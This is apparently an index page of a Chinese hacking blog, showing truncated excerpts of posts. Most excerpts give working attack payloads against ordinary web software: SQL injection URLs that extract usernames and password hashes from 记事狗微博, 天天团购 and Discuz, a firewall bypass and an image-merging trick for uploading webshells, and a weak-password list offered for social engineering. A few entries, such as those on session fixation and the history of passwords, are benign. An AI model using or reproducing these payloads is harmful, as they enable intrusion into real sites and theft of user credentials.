记事狗微博3.0 漏洞

不解释,你懂得!   https://www.webshell.cc/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e...

- 阅读全文 -

关于Session Fixation

前两天我转了篇文章到pst的邮件列表,是关于在struts 2框架下重新生成session的,引起了一些讨论,我觉得有必要在这里提醒下程序员们,可能他们早就遗忘了这种威胁了。 JSESSIONID Regeneration in Struts 2 实际上这就是一种针对Session Fixation 的防范。 Session Fixation 翻译过来就是 “Session 完成攻击”,以前的老的...

- 阅读全文 -

天天团购最新0DAY及爆路径利用

暴路径: https://www.webshell.cc/modules/admin/tttuangou.mod.php 利用: https://www.webshell.cc/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5...

- 阅读全文 -

世界最早的计算机密码和黑客

    大多数人都对记忆密码深痛恶绝,但谁是发明计算机密码的“祸首”?《连线》联系了多位计算机历史学家,他们都一致认为1960年代MIT建造的大型分时计算机CTSS最早采用了密码。CTSS代表Compatible Time-Sharing System,和今天一样,密码并没起到保护作用,MIT博士生Allan Scherr是最早的密码破解黑客。    CTSS是最早的分时操作系统之一,它在许多方面...

- 阅读全文 -

突破护卫神防火墙拦截传马

护卫神软件拦截传马是拦截你文件后缀名,但是不过滤jpg等一些常用文件的后缀! 所以可以用包含的方式 asp <!--#include file="../UpLoadFile/2011091711453973499.jpg" --> php <?php include "2.htm"; ?> 用这种方式的话!就不会被杀掉了! 细心就能发现原来如此! 现在在想法子突破不能添加到...

- 阅读全文 -

IIS7.0畸形解析0day

先合并一张PHP一句话图片马,合并方法: ①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif ②、用edjpgcom,进行图片和一句话木马的合并, 图片随便找一张. 【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到 edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】 ...

- 阅读全文 -

利用Acunetix WVS发动批量网站漏洞评估

我们知道Acunetix WVS可以对网站进行安全性评估,那么怎么能批量扫描呢?游侠(www.youxia.org)在测试WVS 8 BETA2的时候发现WVS居然支持WEB管理,还是很方便的。   打开Acunetix WVS,点New Scan,在弹出来的界面可以看到有三个选项: 最下面一个:如果你想扫描一个网站列表,使用Acunetix计划任务,访问http://localhost:8181...

- 阅读全文 -

Discuz x1.5 – x2版本 二次注射

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 再给出一些语句。 ',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_membe...

- 阅读全文 -

2012最新password总结,社工你懂得

转载不带版权的,趁早离开 不带版权的,一律,你懂得 转载于歌颂大牛的私人藏品 本博客不喜欢那些拿来主义和偷来主义者 ############ 弱密码 ############ a1b2c3 password 12345-9 qwerty abc123 monkey xiaoming admin 5201314 p@assword qq123456 taobao wang1234 fuckU buz...

- 阅读全文 -